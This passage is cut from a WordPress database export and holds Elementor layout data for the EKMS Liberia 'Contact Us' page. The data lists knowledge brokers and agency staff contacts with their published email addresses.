id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19791,2895,'_elementor_edit_mode','builder'),(19792,2895,'_elementor_template_type','wp-page'),(19793,2895,'_elementor_version','2.7.5'),(19794,2895,'_wp_page_template','default'),(19795,2895,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":90,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama 